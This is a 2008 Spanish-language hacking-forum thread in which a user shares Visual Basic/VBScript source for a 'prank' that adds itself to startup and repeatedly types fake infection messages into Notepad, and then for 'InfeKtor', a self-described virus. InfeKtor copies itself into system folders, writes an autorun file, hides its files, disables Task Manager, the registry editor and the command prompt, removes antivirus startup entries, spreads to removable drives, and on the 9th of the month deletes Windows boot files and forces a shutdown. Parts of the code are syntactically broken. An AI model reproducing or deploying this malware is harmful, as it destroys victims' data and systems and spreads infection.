elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Mi proyecto broma en vbs
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Mi proyecto broma en vbs  (Leído 6,289 veces)
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Mi proyecto broma en vbs
« en: 11 Octubre 2008, 22:03 pm »

Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto..

Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado.  >:D
Buena aca el code, es bastante simple :

Código:
Private Sub Form_Load()

'Declaro algunas variables

Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar

On Error Resume Next

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"     

              'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

              'En este tambien, deben dejar solo uno, es opcional

Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"

              ' Se copia asi mismo, en la ruta donde sera buscado luego en el registro

Do
Wscript.sleep 70000   
      ' No hara nada por 1,10 minutos y despues ejecuta el block de notas

Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500      ' Le da tiempo al notepad para que se termine de abrir

WSSvar.AppActivate Molesto.processid
        ' Esto hara que coloque las palabras sobre el block de notas

Wscript.sleep 700                   'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid

         'Envia pulsaciones de teclado que se escribiran sobre el notepad.
         'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     #       #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\  #   #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/  #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/      #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-#     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/   #  #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#      #  #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#     #   #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./    #       #"
Loop       'Se repite nuevamente
 
 
End Sub

pueden hacer este agregado si quieren o bien cambiarlo por:

Código:
Dim WSSvar

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

pero en caso de agregarlo se iniciarian dos..

jaja no se pregunten porque tiene ese nombre "sexDonkey"  :xD :xD

voy a seguir trabajando en el, espero que quede bueno.




SALUD.O.S


« Última modificación: 11 Octubre 2008, 22:09 pm por Bakura182 » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Mi proyecto broma en vbs
« Respuesta #1 en: 11 Octubre 2008, 22:08 pm »

Ahora entiendo porque el problema con el sleep .....

Es que en vbs, si al sleep le pones esperas muy grandes... muere  :xD.

Lo mejor sería utilizar un timer (lo estas haciendo en VB) en una función, y cuando lo necesites lo llamas.

Saludos  ;)


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Mi proyecto broma en vbs
« Respuesta #2 en: 11 Octubre 2008, 22:28 pm »

Ahora entiendo porque el problema con el sleep .....

Es que en vbs, si al sleep le pones esperas muy grandes... muere  :xD.

Es verad jaja pero al exe tambien se lo cierra y listo, fue..

La idea es ponerle el nombre de algu nombre como svchost.exe o winlogon, explorer.exe  :xD :xD :xD

Es asi nomas, la idea es dejar las mejores funciones para los virus y demas..

tengo tres proyectos: dos virus y una broma.. InfeKtor, V-InfeKtor y K-Joke  :xD

Este es el del InfeKtor :

Código:
'-------------------------------------------------------_____##########____-------------------------------------------------
'0111001011011000111010010100000100010001100111011100100\--_--_--_--_--_--/0101011101001010010100100001000100100110001010011
'-------------------------------------------------------/   INFEKTOR 2.4  \-------------------------------------------------
'0101011101001010010100100001000100100110001010011011001\ +--+---+---+--+ /1001011011000111010010100000100010001100111011100
'-------------------------------------------------------/  By: Bakura182  \-------------------------------------------------
'0101100111010111010101011101001110001101010111110100100�������������������0101111101001000101011101000100100110001010010011
'---------------------------------------------------------------------------------------------------------------------------



'Aca defino todas las variables a usar

Dim Batch
Dim InfKFSOvar
Dim CodigoAutoR
Dim InfKWSSvar
Dim EjecChauIniW
Dim i
Dim x
Dim Uni

'Empiezo creando la carpeta que almacenara el virus InfeKtor

On error resume next

Set InfKFSOvar = CreateObject("Scripting.FileSystemObject")
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor"
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
'Se copia asi mismo
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
'Se crea el autorun con las opciones de abrir, explorar y escaneo falso de virus
Set CodigoAutoR = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf",True)
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "[Autorun]"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "shell\1=Abrir"
CodigoAutoR.WriteLine ";mpaF3AkDI2KK5awial3lK43w4Dl3JesLKrj0iL9DcsSo9waO2349wdlk"
CodigoAutoR.WriteLine "shell\1\command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";8lkakfo431kip3dsoe2Daw53dqJsDKKcJalJoof70osK43LKfC0UksswlLksZko5jkL5qsK434LiJe2j"
CodigoAutoR.WriteLine "shell\1\default=1"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9loe5200Ds49LIr8LqXckkKewpAc9oiskk0K4i2arwL30533o4Kdsrajsairwr38al"
CodigoAutoR.WriteLine "Shell\2=Explorar"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5jiie23AJa2awkakf28kDp
CodigoAutoR.WriteLine "Shell\2\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5ji
CodigoAutoR.WriteLine "Shell\5=Escanear virus"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "Shell\5\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9l53REsdSdf3f4gFw692oaA9al"
CodigoAutoR.WriteLine "1=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "2=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "5=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2A3Rsa3L"
CodigoAutoR.Close

'Se crea un bat que le a�ade atributos al virus y demas y que se los saca a otros.. jeje
'Volviendolos visibles para usuarios inexpertos y lograr asi que se autodestruyan el inicio de W
'sino a esperar hasta el nueve como mas abajo se vera

Set Batch = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat",True)
Batch.WriteLine "@echo off"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor"
Batch.WriteLine "attrib -h -r -s C:\IO.sys"
Batch.WriteLine "attrib -h -r -s C:\COMAND.com
Batch.WriteLine "attrib -h -r -s C:\NTDETECT.bat"
Batch.WriteLine "attrib -h -r -s C:\boot.ini"
Batch.WriteLine "attrib -h -r -s C:\MSDOS.sys"
Batch.WriteLine "attrib -h -r -s C:\bootfont.bin"
Batch.WriteLine "attrib -h -r -s C:\ntldr.sys"
Batch.WriteLine "attrib -h -r -s C:\pagefile.sys"
Batch.WriteLine "attrib -h -r -s C:\IO.sys "
Batch.WriteLine "attrib -h -r -s C:\AUTOEXEC.bat"
Batch.WriteLine "attrib -h -r -s C:\CONFIG.sys"
Batch.WriteLine "attrib -h -r -s C:\Windows\WIN.ini
Batch.WriteLine "attrib -h -r -s C:\Windows\SYSTEM.ini
Batch.WriteLine "attrib -a -h -r -s C:\Config.Msi"
Batch.WriteLine "attrib -a -h -r -s C:\RECYCLER"
Batch.WriteLine "attrib -a -h -r -s C:\System Volume Information"
Batch.WriteLine "exit"
Batch.close

'tengo que pasarlo a VBS mejor, no conviene ejecutar un bat ya que saltaria la consola y es muy llamativa..

'Ejecuto el bat

Set InfKWSSvar = CreateObject("WScript.Shell")
InfKWSSvar.Run "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Y lo borro, ya que es muy facil editarlo y hacer lo contrario... ��'


InfKFSOvar.DeleteFile "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Se guarda en el registro y otras opciones
InfKWSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden",0,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",2,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden",1,"REG_DWORD")

InfKWSSvar.regwrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1")

InfKWSSvar.regwrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD")

'Aca quiero agregar la mayor cantidad de AV para que no se inicien, solo llevo dos =( ..

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NAV Agent"

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kav"



'Si el dia es distinto a 9 entonces procede a crear una copia de si mismo con un nombre diferente, sino borra los archivos de arranque de windows, sin ellos windows no arranca


if Day(Now()) <> 9 then
Wscript.sleep 10000
Randomize
Azar = Int(Rnd * 10)
If Azar = "0" Then Nombre = "Password Generator"
If Azar = "1" Then Nombre = "Install K-raoke"
If Azar = "2" Then Nombre = "SysUtils"
If Azar = "3" Then Nombre = "UnistallerX"
If Azar = "4" Then Nombre = "Mk2"
If Azar = "5" Then Nombre = ""
If Azar = "6" Then Nombre = "Messenger error"
If Azar = "7" Then Nombre = "Iexplorer"
If Azar = "8" Then Nombre = "Abu"
If Azar = "9" Then Nombre = "EasyWeb"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Mis documentos" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Adminstrador\Escritorio" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\All Users\Escritorio
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\Usuario\Escritorio"," & Nombre & ".exe"

'Tendria que crear algo que despues ejecute a cualquiera de ellos, sino es en vano jaja

else
On error resume next
InfKFSOvar.DeleteFile "C:\IO.sys"
InfKFSOvar.DeleteFile "C:\AUTOEXEC.bat"
InfKFSOvar.DeleteFile "C:\CONFIG.sys"
InfKFSOvar.DeleteFile "C:\COMAND.com"
InfKFSOvar.DeleteFile "C:\NTDETECT.bat"
InfKFSOvar.DeleteFile "C:\Windows\WIN.ini"
InfKFSOvar.DeleteFile "C:\boot.ini"
InfKFSOvar.DeleteFile "C:\MSDOS.sys"
InfKFSOvar.DeleteFile "C:\bootfont.bin"
InfKFSOvar.DeleteFile "C:\ntldr.sys"
InfKFSOvar.DeleteFile "C:\pagefile.sys"
InfKFSOvar.DeleteFile "C:\Windows\SYSTEM.ini"
InfKFSOvar.DeleteFolder "C:\Config.Msi"
InfKFSOvar.DeleteFolder "C:\RECYCLER"
InfKFSOvar.DeleteFolder "C:\System Volume Information".DeleteFile "C:\IO.sys"
End if
'Crea otro bat que apaga el ordenador y  avisa que ha sido victima del infeKtor (tarde el aviso pero bueh,ja)

Set ChauIniW = InfKFSOvar.CreateTextFile ".\Salud.o.s.bat,True"
ChauIniW.Writeline "@echo off"
ChauIniW.Writeline "Shutdown -s -t 5 -c Has_Sido_Victima_Del_InfeKtor..."
ChauIniW.Writeline "Exit"
ChauIniW.Close
Set EjecChauIniW = CreateObject("WScript.Shell")
EjecChauIniW.Run ".\Salud.o.s.bat"
End if
'Propagacion por unidades
' he aqui el ejemplo tuyo de propagacion

Set FSOvar = createobject("scripting.filesystemobject")
Set uni = FSOvar.drives
 
For each x in uni
If x.driveletter <> "A" and x.drivetype = 1 then
FSOvar.copyfile wscript.scriptfullname, x.driveletter &":\"
msgbox "contagio en " & x.driveletter
End If
Next

Debo remplazar el bat por codigo en vbs , con los atributos en 39, pero lo hago despues, estoy muy ocupado con el estudio jaja



SALUD.O.S
« Última modificación: 11 Octubre 2008, 23:06 pm por Bakura182 » En línea

Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Mi proyecto broma en vbs
« Respuesta #3 en: 11 Octubre 2008, 22:32 pm »

Ahora que lo leo bien....

Me falto copiar el autorun en las unidades extraibles.!!   :¬¬ :¬¬ :¬¬ :¬¬

todavia esta en construccion, todos los dias trabajo un poquitito en ellos, si tengo tiempo claro..



SALUD.O.S
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Mi proyecto broma en vbs
« Respuesta #4 en: 11 Octubre 2008, 22:54 pm »

¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.

Saludos.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Mi proyecto broma en vbs
« Respuesta #5 en: 11 Octubre 2008, 22:56 pm »

¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.
Saludos.

Porque piensa compilarlo con VB :P
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Mi proyecto broma en vbs
« Respuesta #6 en: 11 Octubre 2008, 23:00 pm »

Ya se que es de VB..  :¬¬

Se me mezclan las cosas, los pruebo en VBS y los paso a VB cambiando un par de cosas..

En resumen, se me fue de manos..  :rolleyes:

Ahora lo edito... para la gente que le molesta ver eso ahi  >:D


SALUD.O.S
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Mi proyecto broma en vbs
« Respuesta #7 en: 11 Octubre 2008, 23:22 pm »

No hace falta hombre, lo que pasa es que no me coincidía.

Saludos.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
broma bat!!! « 1 2 ... 8 9 »
Hacking
von Newman 88 60,747 Último mensaje 27 Diciembre 2010, 23:42 pm
por von Newman
Broma c++
Programación C/C++
daryo 7 5,234 Último mensaje 24 Mayo 2013, 22:57 pm
por Stakewinner00
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines